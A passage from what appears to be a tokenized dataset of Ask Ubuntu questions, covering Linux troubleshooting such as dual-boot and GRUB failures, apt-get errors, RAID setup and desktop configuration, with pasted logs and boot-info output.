to remove and 5 not upgraded . need to get 0 b/489 kb of archives . after this operation , 4,196 kb of additional disk space will be used . selecting previously unselected package nautilus . ( reading database ... 393639 files and directories currently installed . ) unpacking nautilus ( from ... /nautilus_1 % 3a3.8.2-0ubuntu2.2_i386.deb ) ... processing triggers for desktop-file-utils ... processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf-2.index ... processing triggers for gnome-menus ... processing triggers for mime-support ... processing triggers for man-db ... setting up nautilus ( 1:3.8.2-0ubuntu2.2 ) ... but that gets me right back to where i started eoin @ desktop : ~ $ nautilus the program 'nautilus ' is currently not installed . you can install it by typing : sudo apt-get install nautilus i 've tried resetting unity configuration ( as per this question ) , and also sudo dpkg-reconfigure for both unity and nautilus . any ideas ?
430770	how to boot from cd / dvd and install from usb ?	i 've got an legacy notebook ( toshiba satellite 1110 ) . i would like to install lubuntu 14.04 . unfortunately i was not able to boot from usb . the device is over 10 years old and has only got usb 1.x . i already updated the bios to the latest version for this device ( phoenixbios 1.5 from 2007 or 2008 ) , but i still ca n't boot from usb . any hints on usb boot are welcome . i am able to boot from cd / dvd and got a disk with xubuntu 09.10 . from there i have access the the usb drive with the image i want to install . when i boot from cd to the xubuntu desktop , how can i start the installation of the image on the usb drive ? does this cause problems because i bootet with an older linux version ( xubuntu 09.10 ) but trying to install a later one from which i did not boot ? or can i make use of the live-cd boot menu / boot commands to boot the usb drive from there ? or should i install grub and make it boot from usb drive ?
430771	running upgrade via command	i was trying to run upgrade in ubuntu having run update via command but , afterwards , it displayed : ldconfig deferred processing now taking place please , what does that msg mean ?
430772	one of my partitions is n't shown anymore after i installed ubuntu	i bought my asus in 2012 . it came to me with freedos . i installed windows 7 and a few days ago i wanted to install ubuntu 12.04.4 to my pc alongside windows 7 . but i read about uefi about problem which happens to new pcs . i have c , d , e partitions on my pc . windows is in c. i wanted to install ubuntu to e. the e partition has 58 gb . and 50 gb of it is empty . and i parted that 50 gb to 30 gb . and in my boot menu there is something like that . boot option # 1 : uefi : dvdram boot option # 2 : ht sata boot option # 3 : dvdram i booted my pc using 3rd option thinking that my system is not in uefi mode . there was no any problem . i chose something else . and the disk partitions window has come . i knew my c , d. i did not touch them , but there also to partitons which are sda2 which is double clickable . the other one says that it can not be used and i chose the sda2 and formatted it in ext4 but swap area is not created . and i continued whithout formatting the swap area . but my ubuntu and windows works well . only one problem my e partition has dissapeared . it is not important but i created different place for ubuntu . why is this happening ?
430774	ubuntu 12.04 keeps freezing after dual boot with windows 8	i have successfully dual booted ubuntu 12.04 alongside with windows 8.1 . however my problem is ubuntu 12.04 keeps freezing , keyboard and mouse do n't work . it happens when i run ubuntu for about 10 mins , initially it was fast . during that 10 mins , i installed new software through the terminal , and updated the firefox browser . i thought the problem was that the allocated space for swap was too small , so i decided to increase the size to 30gb . this does n't solve the problem . could you please let me the possible causes or solutions ?
430776	how can i modify the power button behaviour ?	i want the pc to shut down without any dialogue , but let time for the applications to close properly . one solution is , to change powerbtn.sh to : shutdown -h now but that does not wait for all applications to close .
430778	preventing `` pasting '' ( p ) from copying selected text to register in vim	what i want is : copy some part of text replace some other parts of text with copied part . what i do is : make a selection : v yanking the selection : y making another selection : v paste the yanked text : p but whenever i paste , it replaces current selection with old yanked selection , but copies the replaced ( deleted ) selection to register . how to make p just paste and do nothing more ?
430780	how to create a file even root user also ca n't delete ? is there any possiblities ?	is there any way to create to a file that root user also cant delete ?
430784	how to know that a successful upgrade has been completed via command	what message should be displayed on ubuntu command line to show that a successful upgrade has been completed ( via command ) ?
430785	music player to display the underlying folder structure	i am using ubuntu 12.04 and am looking for a music player ( banshee , rhythmbox or other ) which can display the music files and folders as-is and not organized by artist/album/genre or some other field . i tried out banshee and rhythmbox and could not figure how to . btw , the music i have is not labeled and is just organized in different folders .
430786	wireless presenter with prezi	i have a targus wireless presenter with laser pointer which i intend to use with my prezi presentations . the presenter works perfectly when presentations are not maximized , but when they are , the frame-flipping buttons do not work . i 've tried this with both chromium and firefox and the behavior is the same . the presenter works okay in libreoffice impress .
430797	dual boot problem with xp64bit	i have just loaded ubuntu 13.10 alongside windows xp 64bit and on reboot it defaults to windows only , with no sign of ubuntu . any ideas ?
430801	how can i fix apt-get update and installation errors ?	earlier , i had used : sudo apt-get remove samba thinking that it will remove samba . but it started uninstalling all my applications including libreoffice , texteditor , java plugin software update manager etc . and now i am getting error , for the update command $ sudo apt-get update err http : //snapshot.debian.org lenny release.gpg something wicked happened resolving 'snapshot.debian.org : http ' ( -5 - no address associated with hostname ) err http : //archive.ubuntu.com precise release.gpg something wicked happened resolving 'archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) err http : //snapshot.debian.org lenny/updates release.gpg something wicked happened resolving 'snapshot.debian.org : http ' ( -5 - no address associated with hostname ) ign http : //archive.ubuntu.com precise release ign http : //snapshot.debian.org lenny release ign http : //snapshot.debian.org lenny/updates release ign http : //snapshot.debian.org lenny/main translationindex ign http : //snapshot.debian.org lenny/updates/main translationindex ign http : //archive.ubuntu.com precise/main translationindex ign http : //archive.ubuntu.com precise/multiverse translationindex ign http : //archive.ubuntu.com precise/restricted translationindex ign http : //archive.ubuntu.com precise/universe translationindex err http : //snapshot.debian.org lenny/main sources something wicked happened resolving 'snapshot.debian.org : http ' ( -5 - no address associated with hostname ) err http : //snapshot.debian.org lenny/main i386 packages something wicked happened resolving 'snapshot.debian.org : http ' ( -5 - no address associated with hostname ) err http : //snapshot.debian.org lenny/updates/main sources something wicked happened resolving 'snapshot.debian.org : http ' ( -5 - no address associated with hostname ) err http : //snapshot.debian.org lenny/updates/main i386 packages something wicked happened resolving 'snapshot.debian.org : http ' ( -5 - no address associated with hostname ) err http : //snapshot.debian.org lenny/main translation-en_us something wicked happened resolving 'snapshot.debian.org : http ' ( -5 - no address associated with hostname ) err http : //snapshot.debian.org lenny/main translation-en something wicked happened resolving 'snapshot.debian.org : http ' ( -5 - no address associated with hostname ) err http : //snapshot.debian.org lenny/updates/main translation-en_us something wicked happened resolving 'snapshot.debian.org : http ' ( -5 - no address associated with hostname ) err http : //snapshot.debian.org lenny/updates/main translation-en something wicked happened resolving 'snapshot.debian.org : http ' ( -5 - no address associated with hostname ) err http : //archive.ubuntu.com precise/main sources something wicked happened resolving 'archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) err http : //archive.ubuntu.com precise/universe sources something wicked happened resolving 'archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) err http : //archive.ubuntu.com precise/restricted sources something wicked happened resolving 'archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) err http : //archive.ubuntu.com precise/multiverse sources something wicked happened resolving 'archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) err http : //archive.ubuntu.com precise/main i386 packages something wicked happened resolving 'archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) err http : //archive.ubuntu.com precise/universe i386 packages something wicked happened resolving 'archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) err http : //archive.ubuntu.com precise/restricted i386 packages something wicked happened resolving 'archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) err http : //archive.ubuntu.com precise/multiverse i386 packages something wicked happened resolving 'archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) err http : //archive.ubuntu.com precise/main translation-en_us something wicked happened resolving 'archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) err http : //archive.ubuntu.com precise/main translation-en something wicked happened resolving 'archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) err http : //archive.ubuntu.com precise/multiverse translation-en_us something wicked happened resolving 'archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) err http : //archive.ubuntu.com precise/multiverse translation-en something wicked happened resolving 'archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) err http : //archive.ubuntu.com precise/restricted translation-en_us something wicked happened resolving 'archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) err http : //archive.ubuntu.com precise/restricted translation-en something wicked happened resolving 'archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) err http : //archive.ubuntu.com precise/universe translation-en_us something wicked happened resolving 'archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) err http : //archive.ubuntu.com precise/universe translation-en something wicked happened resolving 'archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/precise/release.gpg something wicked happened resolving 'archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) w : failed to fetch http : //snapshot.debian.org/archive/debian/20070730t000000z/dists/lenny/release.gpg something wicked happened resolving 'snapshot.debian.org : http ' ( -5 - no address associated with hostname ) w : failed to fetch http : //snapshot.debian.org/archive/debian-security/20070730t000000z/dists/lenny/updates/release.gpg something wicked happened resolving 'snapshot.debian.org : http ' ( -5 - no address associated with hostname ) w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/precise/main/source/sources something wicked happened resolving 'archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/precise/universe/source/sources something wicked happened resolving 'archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/precise/restricted/source/sources something wicked happened resolving 'archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/precise/multiverse/source/sources something wicked happened resolving 'archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/precise/main/binary-i386/packages something wicked happened resolving 'archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/precise/universe/binary-i386/packages something wicked happened resolving 'archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/precise/restricted/binary-i386/packages something wicked happened resolving 'archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/precise/multiverse/binary-i386/packages something wicked happened resolving 'archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) w : failed to fetch http : //snapshot.debian.org/archive/debian/20070730t000000z/dists/lenny/main/source/sources something wicked happened resolving 'snapshot.debian.org : http ' ( -5 - no address associated with hostname ) w : failed to fetch http : //snapshot.debian.org/archive/debian/20070730t000000z/dists/lenny/main/binary-i386/packages something wicked happened resolving 'snapshot.debian.org : http ' ( -5 - no address associated with hostname ) w : failed to fetch http : //snapshot.debian.org/archive/debian-security/20070730t000000z/dists/lenny/updates/main/source/sources something wicked happened resolving 'snapshot.debian.org : http ' ( -5 - no address associated with hostname ) w : failed to fetch http : //snapshot.debian.org/archive/debian-security/20070730t000000z/dists/lenny/updates/main/binary-i386/packages something wicked happened resolving 'snapshot.debian.org : http ' ( -5 - no address associated with hostname ) w : failed to fetch http : //snapshot.debian.org/archive/debian/20070730t000000z/dists/lenny/main/i18n/translation-en_us something wicked happened resolving 'snapshot.debian.org : http ' ( -5 - no address associated with hostname ) w : failed to fetch http : //snapshot.debian.org/archive/debian/20070730t000000z/dists/lenny/main/i18n/translation-en something wicked happened resolving 'snapshot.debian.org : http ' ( -5 - no address associated with hostname ) w : failed to fetch http : //snapshot.debian.org/archive/debian-security/20070730t000000z/dists/lenny/updates/main/i18n/translation-en_us something wicked happened resolving 'snapshot.debian.org : http ' ( -5 - no address associated with hostname ) w : failed to fetch http : //snapshot.debian.org/archive/debian-security/20070730t000000z/dists/lenny/updates/main/i18n/translation-en something wicked happened resolving 'snapshot.debian.org : http ' ( -5 - no address associated with hostname ) w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/precise/main/i18n/translation-en_us something wicked happened resolving 'archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/precise/main/i18n/translation-en something wicked happened resolving 'archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/precise/multiverse/i18n/translation-en_us something wicked happened resolving 'archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/precise/multiverse/i18n/translation-en something wicked happened resolving 'archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/precise/restricted/i18n/translation-en_us something wicked happened resolving 'archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/precise/restricted/i18n/translation-en something wicked happened resolving 'archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/precise/universe/i18n/translation-en_us something wicked happened resolving 'archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/precise/universe/i18n/translation-en something wicked happened resolving 'archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) e : some index files failed to download . they have been ignored , or old ones used instead . further while trying to install any application , i get the error , in this case for installing vim : - reading package lists ... done building dependency tree reading state information ... done package vim-gnome is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'vim-gnome ' has no installation candidate any help is appreciated . thank you
430802	recursively copying files	how can i copy *.txt files only from a directory and all its children directories ? say i have a folder a containing .txt files and subfolders b c etc that contain .txt files and so on and i just want all the .txt files ?
430803	unable to edit settings for dirty memory	ive been reading for quite some time on trying to edit the dirty memory settings and for some reason i cant save changes to any of the files even when i use sudo . the biggest reason i want to change them is im on a laptop and naturally i want to squeeze out as much battery life as i can ( i can manage to eek out 2 hours even with my cpu throttled to 50 % which is as low as it goes and my brightness all the way down ) . im using laptop-mode to configure my powersave features but for some reason on battery about every 20 seconds or so my hard drive spins back up to write a bit of data ( a few kb at most over a span of 15-20 seconds or so ) then my disk will spin back down . this is really starting to frustrate me as it is a brand new drive and i dont want to ruin it and i know that constant spinning up is killing my battery life : ( im running ubuntu 12.04. thanks in advance for any help/advice !
430806	ubuntu 12.04 lts issue with sysv / udev : after upgrade no init script works	i am sort of refining my server 's issues i have found some time ago and still persisting after more than half a year . here are some of my previous `` installments '' about this issue : after last update , my varnish and all services broke ! apt-get dist-upgrade wants to destroy my ubuntu 12.04 lts basically , long ago i had installed ondrej 's ppa in order to get an updated suite of php stuff to work with my nginx web server . apparently , by reading ondrej 's messages , at a certain point he decided to merge low level services into his ppa . this is causing me some nasty side effects . i have chipped at and refined a list of packages : if i install them , my system will still reboot , but it will show just 75m being used ( normally it 's about 1gb ) and no services like nginx , php-fpm , dovecot , pure-ftpd etc . etc . will get started at all . i know there have been some changes in the way ubuntu init files are started but i had not time to follow the exact flow of the changes . so it 's perfectly possible i have init files being started in a way and the services daemon proposed in the upgrade does not `` see '' them at all . as of now , everything works as long as i never say yes to this apt-get upgrade prompt : the following packages will be upgraded : init-system-helpers initscripts sysv-rc sysvinit-utils udev 5 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . need to get 1,393 kb of archives . after this operation , 4,308 kb of additional disk space will be used . do you want to continue [ y/n ] ? out of that list , just upgrading udev means getting a crippled system at next reboot . i 'd be most grateful if some good guy could give me directions about how to make my system upgraded without losing all my services .
430807	i 've made a bit of a mess with my hd and raid setup	i 'm using ubuntu 12.04.4 server and this is my current setup : my hard disks : wax @ petra : ~ $ sudo fdisk -l /dev/sda disk /dev/sda : 1500.3 gb , 1500301910016 bytes 255 testine , 63 settori/tracce , 182401 cilindri , totale 2930277168 settori unitã = settori di 1 * 512 = 512 byte sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes identificativo disco : 0x00000000 dispositivo boot start end blocks id system /dev/sda1 * 63 2930272064 1465136001 fd autorilevamento raid di linux wax @ petra : ~ $ sudo fdisk -l /dev/sdb disk /dev/sdb : 1500.3 gb , 1500301910016 bytes 255 testine , 63 settori/tracce , 182401 cilindri , totale 2930277168 settori unitã = settori di 1 * 512 = 512 byte sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes identificativo disco : 0x00000000 dispositivo boot start end blocks id system /dev/sdb1 63 2930272064 1465136001 fd autorilevamento raid di linux wax @ petra : ~ $ sudo fdisk -l /dev/sdc disk /dev/sdc : 163.9 gb , 163928604672 bytes 255 testine , 63 settori/tracce , 19929 cilindri , totale 320173056 settori unitã = settori di 1 * 512 = 512 byte sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes identificativo disco : 0x8f8000b1 dispositivo boot start end blocks id system /dev/sdc1 2048 3905535 1951744 82 linux swap / solaris /dev/sdc2 3907582 320172031 158132225 5 esteso /dev/sdc5 * 3907584 320172031 158132224 83 linux wax @ petra : ~ $ sudo fdisk -l /dev/sdd disk /dev/sdd : 3000.6 gb , 3000592982016 bytes 255 testine , 63 settori/tracce , 364801 cilindri , totale 5860533168 settori unitã = settori di 1 * 512 = 512 byte sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes identificativo disco : 0x00000000 il disco /dev/sdd non contiene una tabella delle partizioni valida this is the mdadm output : wax @ petra : ~ $ cat /proc/mdstat personalities : [ linear ] [ multipath ] [ raid0 ] [ raid1 ] [ raid6 ] [ raid5 ] [ raid4 ] [ raid10 ] md1 : active raid1 sdd [ 3 ] md0 [ 2 ] 2930135360 blocks super 1.2 [ 2/2 ] [ uu ] md0 : active linear sdb [ 0 ] sda [ 1 ] 2930277152 blocks super 1.2 0k rounding unused devices : < none > why sda1 and sdb1 are market as boot ? my boot disk is sdc . also grub is installed in sdc and in sda i think that 's an error right ? why sda and sdb have partitions while sdd does n't ? is there something wrong with my setup ?
430809	unable to run .py file in 13.10	unable to run .py file in ubuntu 13.10 server . it returns this error : traceback ( most recent call last ) : file `` events_send.py '' , line 2 , in < module > import pika importerror : no module named pika
430820	changed root directory 's permissions to 644 , how can i change it back ?	i changed the root directory 's permissions to 664 . now my display and keyboard are disabled . how can i change it back ?
430822	hide toolbar in evince , ubuntu 13.10	i find that the view menu has disappeared in the newest version of evince . is there still a way to hide the toolbar ? i would like to do this in order to share a presentation using a google hangout-on-air . so far , the toolbar shows up at the top . thanks .
430829	change background and foreground color of special windows	i 'm customizing my xubuntu theme . with gnome color chooser i can change most of the default option regarding the colours of windows background . but seems that for some special widows like volume control , ubuntu software center i do n't have any possibility to control the background and the foreground colour . unfortunately , i do n't know why , they have a very bad colour combination ( white foreground in a light grey background see figure ) so i do n't see anything . how can i change the background color of these `` special windows '' ? even a default scheme for these one for me goes well but not white over light gray !
430831	bootloader location	sorry , an error occured and it was not possible to install the bootloader at the specified location . how would you like to proceed ? choose a different device to install the bootloader on : /dev/sdb continue without bootloader . cancel installation .
430833	`` bad archive mirror '' error while installing ubuntu server 12.04	i downloaded the server version of ubuntu from ubuntu 's official site . created a bootable usb from the iso file i downloaded . i connected through internet using dhcp in the installation process . while i was installing it on my desktop computer ( pentium d 1 gb ram ) i have this error `` bad archive mirror '' . i also found 2-3 questions with same problem on forum but i did n't get solution of my problem from them .
430835	ubuntu is freezing a few seconds after login	i 've installed ubuntu 12.04 and activated the drivers for nvidia . but right the restart , it froze just a few seconds after login . it does n't allow me to uninstall or check anything .
430836	how can you disable qualcomm atheros in ubuntu 13.10 plazma kde desktop ?	help me quick for my job ! ! i have two internet connections ! !
430839	customising the ubuntu linux kernel	can any one tell me how to customize the linux kernel for ubuntu package so that my kernel size can be reduced with necessary packages and the new kernel size should be very small ?
430840	ca n't boot , grub screen appears and error when live usb install	my computer ( zenbook ux31a ) and i have ubuntu 13.10 and windows 8 installed ( on different partitions ) . my ubuntu suddenly stopped working yesterday ... i first got a `` kernel panicked '' screen and then i forced shutdown and restarted it and it went directly to grub line command something of the form gnu grub version 2.00-19ubuntu2.1 [ minimal bash-like line editing is supported . for the first word , tab lists possible command completions . anywhere else tab lists the possible completions of a device/filename. ] grub > _ i tried to reinstall ubuntu from a live usb but i get an error of the form installation failed the installer encountered an unrecoverable error . a desktop session will now be run so that you may investigate the problem or try installing again . then i tried to mount the partition with ubuntu and to reinstall the grub - following the instructions here http : //www.webupd8.org/2009/12/how-to-recover-grub2-linux.html no error occured but it did n't work . on the other hand funny thing happens : when i run fdisk -l i do n't get al my sda1 , sda2 , ... , sda7 . i only get /dev/sda1 then /dev/sdb and device boot /def/sdb1 ( which should be the usb stick i 'm using ) . then i tried boot-repair but it also gave me some error at the end . `` an error occurred during the repair . '' it also prompted several times to me that the boot is in legacy mode and i should retry in efi mode - but in efi mode the liveusb wo n't boot ( i mean it boots but it stays black immediately after i choose an option ( try ubuntu , install ubuntu , etc . ) ) here are the details ( i tried several times ) http : //paste.ubuntu.com/7049571/ http : //paste.ubuntu.com/7049579/ http : //paste.ubuntu.com/7049585/ here 's also the results of the bootinfo ============================= boot info summary : =============================== = > grub2 ( v1.99 ) is installed in the mbr of /dev/sda and looks at sector 198998016 of the same hard drive for core.img . core.img is at this location and looks in partition 94 for . = > syslinux mbr ( 4.04 and higher ) is installed in the mbr of /dev/sdb . sda1 : __________________________________________ file system : vfat boot sector type : unknown boot sector info : no errors found in the boot parameter block . operating system : boot files : /efi/boot/bkpbootx64.efi /efi/boot/bootx64.efi /efi/ubuntu/grubx64.efi /efi/ubuntu/mokmanager.efi /efi/ubuntu/shimx64.efi sda2 : __________________________________________ file system : ntfs boot sector type : windows vista/7 : ntfs boot sector info : no errors found in the boot parameter block . mounting failed : mount : according to mtab , /dev/sda2 is already mounted on /tmp/bootinfo-ghfasxep/sda2 mount : according to mtab , /dev/sda2 is already mounted on /tmp/bootinfo-ghfasxep/sda2 sda3 : __________________________________________ file system : boot sector type : - boot sector info : mounting failed : mount : according to mtab , /dev/sda2 is already mounted on /tmp/bootinfo-ghfasxep/sda2 mount : according to mtab , /dev/sda2 is already mounted on /tmp/bootinfo-ghfasxep/sda2 mount : unknown filesystem type '' sda4 : __________________________________________ file system : ntfs boot sector type : windows vista/7 : ntfs boot sector info : no errors found in the boot parameter block . mounting failed : mount : according to mtab , /dev/sda2 is already mounted on /tmp/bootinfo-ghfasxep/sda2 mount : according to mtab , /dev/sda2 is already mounted on /tmp/bootinfo-ghfasxep/sda2 mount : unknown filesystem type '' mount : according to mtab , /dev/sda4 is already mounted on /tmp/bootinfo-ghfasxep/sda4 mount : according to mtab , /dev/sda4 is already mounted on /tmp/bootinfo-ghfasxep/sda4 sda5 : __________________________________________ file system : ext4 boot sector type : - boot sector info : operating system : ubuntu 13.10 boot files : /etc/fstab sda6 : __________________________________________ file system : ntfs boot sector type : windows vista/7 : ntfs boot sector info : no errors found in the boot parameter block . mounting failed : mount : according to mtab , /dev/sda2 is already mounted on /tmp/bootinfo-ghfasxep/sda2 mount : according to mtab , /dev/sda2 is already mounted on /tmp/bootinfo-ghfasxep/sda2 mount : unknown filesystem type '' mount : according to mtab , /dev/sda4 is already mounted on /tmp/bootinfo-ghfasxep/sda4 mount : according to mtab , /dev/sda4 is already mounted on /tmp/bootinfo-ghfasxep/sda4 mount : according to mtab , /dev/sda6 is already mounted on /tmp/bootinfo-ghfasxep/sda6 mount : according to mtab , /dev/sda6 is already mounted on /tmp/bootinfo-ghfasxep/sda6 sda7 : __________________________________________ file system : boot sector type : - boot sector info : mounting failed : mount : according to mtab , /dev/sda2 is already mounted on /tmp/bootinfo-ghfasxep/sda2 mount : according to mtab , /dev/sda2 is already mounted on /tmp/bootinfo-ghfasxep/sda2 mount : unknown filesystem type '' mount : according to mtab , /dev/sda4 is already mounted on /tmp/bootinfo-ghfasxep/sda4 mount : according to mtab , /dev/sda4 is already mounted on /tmp/bootinfo-ghfasxep/sda4 mount : according to mtab , /dev/sda6 is already mounted on /tmp/bootinfo-ghfasxep/sda6 mount : according to mtab , /dev/sda6 is already mounted on /tmp/bootinfo-ghfasxep/sda6 mount : unknown filesystem type '' sda8 : __________________________________________ file system : ntfs boot sector type : windows vista/7 : ntfs boot sector info : no errors found in the boot parameter block . mounting failed : mount : according to mtab , /dev/sda2 is already mounted on /tmp/bootinfo-ghfasxep/sda2 mount : according to mtab , /dev/sda2 is already mounted on /tmp/bootinfo-ghfasxep/sda2 mount : unknown filesystem type '' mount : according to mtab , /dev/sda4 is already mounted on /tmp/bootinfo-ghfasxep/sda4 mount : according to mtab , /dev/sda4 is already mounted on /tmp/bootinfo-ghfasxep/sda4 mount : according to mtab , /dev/sda6 is already mounted on /tmp/bootinfo-ghfasxep/sda6 mount : according to mtab , /dev/sda6 is already mounted on /tmp/bootinfo-ghfasxep/sda6 mount : unknown filesystem type '' mount : according to mtab , /dev/sda8 is already mounted on /tmp/bootinfo-ghfasxep/sda8 mount : according to mtab , /dev/sda8 is already mounted on /tmp/bootinfo-ghfasxep/sda8 sda9 : __________________________________________ file system : bios boot partition boot sector type : grub2 's core.img boot sector info : sda10 : _________________________________________ file system : swap boot sector type : - boot sector info : sdb1 : __________________________________________ file system : vfat boot sector type : syslinux 4.07 2013-07-25 boot sector info : syslinux looks at sector 60824 of /dev/sdb1 for its second stage . syslinux is installed in the /uui directory . no errors found in the boot parameter block . operating system : boot files : /boot/grub/grub.cfg /efi/boot/grubx64.efi ============================ drive/partition info : ============================= drive : sda _______________________________________ disk /dev/sda : 128.0 gb , 128035676160 bytes 255 heads , 63 sectors/track , 15566 cylinders , total 250069680 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes partition boot start sector end sector # of sectors id system /dev/sda1 1 250,069,679 250,069,679 ee gpt guid partition table detected . partition start sector end sector # of sectors system /dev/sda1 2,048 616,447 614,400 efi system partition /dev/sda2 616,448 2,459,647 1,843,200 windows recovery environment ( windows ) /dev/sda3 2,459,648 2,721,791 262,144 microsoft reserved partition ( windows ) /dev/sda4 2,721,792 153,944,063 151,222,272 data partition ( windows/linux ) /dev/sda5 153,944,064 198,998,015 45,053,952 data partition ( windows/linux ) /dev/sda6 199,000,064 199,716,863 716,800 windows recovery environment ( windows ) /dev/sda7 199,716,864 208,105,471 8,388,608 - /dev/sda8 208,105,472 241,680,383 33,574,912 windows recovery environment ( windows ) /dev/sda9 198,998,016 199,000,063 2,048 bios boot partition /dev/sda10 241,680,384 250,068,991 8,388,608 swap partition ( linux ) drive : sdb _______________________________________ disk /dev/sdb : 8004 mb , 8004304896 bytes 247 heads , 62 sectors/track , 1020 cylinders , total 15633408 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes partition boot start sector end sector # of sectors id system /dev/sdb1 * 62 15,620,279 15,620,218 c w95 fat32 ( lba ) '' blkid '' output : ____________________________________ device uuid type label /dev/loop0 squashfs /dev/loop1 f7d1f711-9329-e34b-9531-4e5b38000406 ext2 casper-rw /dev/sda1 aaec-68a5 vfat system /dev/sda10 735b1b4e-c7b0-4d92-b6e0-7ce2336e96bc swap /dev/sda2 6204d14004d117bd ntfs recovery /dev/sda4 90ceda8aceda684c ntfs os /dev/sda5 d1515ac5-ae0b-40b6-8b18-a500828f4c49 ext4 /dev/sda6 7e44f3b044f368f3 ntfs /dev/sda8 de36e15136e12aeb ntfs restore /dev/sdb1 1204-0a22 vfat uui ================================ mount points : ================================= device mount_point type options /dev/loop0 /rofs squashfs ( ro , noatime ) /dev/sdb1 /cdrom vfat ( rw , relatime , fmask=0022 , dmask=0022 , codepage=437 , iocharset=iso8859-1 , shortname=mixed , errors=remount-ro ) =============================== sda5/etc/fstab : ================================ /etc/fstab : static file system information . # use 'blkid ' to print the universally unique identifier for a device ; this may be used with uuid= as a more robust way to name devices that works even if disks are added and removed . see fstab ( 5 ) . # / was on /dev/sda5 during installation uuid=d1515ac5-ae0b-40b6-8b18-a500828f4c49 / ext4 errors=remount-ro 0 1 uuid=aaec-68a5 /boot/efi vfat defaults 0 1 uuid=90ceda8aceda684c /media/dragos/os ntfs rw , auto , users , exec , nls=utf8 , umask=003 , gid=46 , uid=1000 0 0 uuid=735b1b4e-c7b0-4d92-b6e0-7ce2336e96bc none swap sw 0 0 =================== sda5 : location of files loaded by grub : ==================== gib - gb file fragment ( s ) =========================== sdb1/boot/grub/grub.cfg : =========================== if loadfont /boot/grub/font.pf2 ; then set gfxmode=auto insmod efi_gop insmod efi_uga insmod gfxterm terminal_output gfxterm fi set menu_color_normal=white/black set menu_color_highlight=black/light-gray menuentry `` try ubuntu without installing '' { set gfxpayload=keep linux /casper/vmlinuz.efi file=/cdrom/preseed/ubuntu.seed cdrom-detect/try-usb=true persistent noprompt floppy.allowed_drive_mask=0 ignore_uuid boot=casper quiet splash -- initrd /casper/initrd.lz } menuentry `` install ubuntu '' { set gfxpayload=keep linux /casper/vmlinuz.efi file=/cdrom/preseed/ubuntu.seed cdrom-detect/try-usb=true persistent noprompt floppy.allowed_drive_mask=0 ignore_uuid boot=casper only-ubiquity quiet splash -- initrd /casper/initrd.lz } menuentry `` oem install ( for manufacturers ) '' { set gfxpayload=keep linux /casper/vmlinuz.efi file=/cdrom/preseed/ubuntu.seed cdrom-detect/try-usb=true persistent noprompt floppy.allowed_drive_mask=0 ignore_uuid boot=casper only-ubiquity quiet splash oem-config/enable=true -- initrd /casper/initrd.lz } menuentry `` check disc for defects '' { set gfxpayload=keep linux /casper/vmlinuz.efi cdrom-detect/try-usb=true persistent noprompt floppy.allowed_drive_mask=0 ignore_uuid boot=casper integrity-check quiet splash -- initrd /casper/initrd.lz } =================== sdb1 : location of files loaded by grub : ==================== gib - gb file fragment ( s ) ======================== unknown mbrs/boot sectors/etc : ======================== unknown gpt partiton type dee2bfd3af3ddf11ba40e3a556d89593 unknown bootloader on sda1 00000000 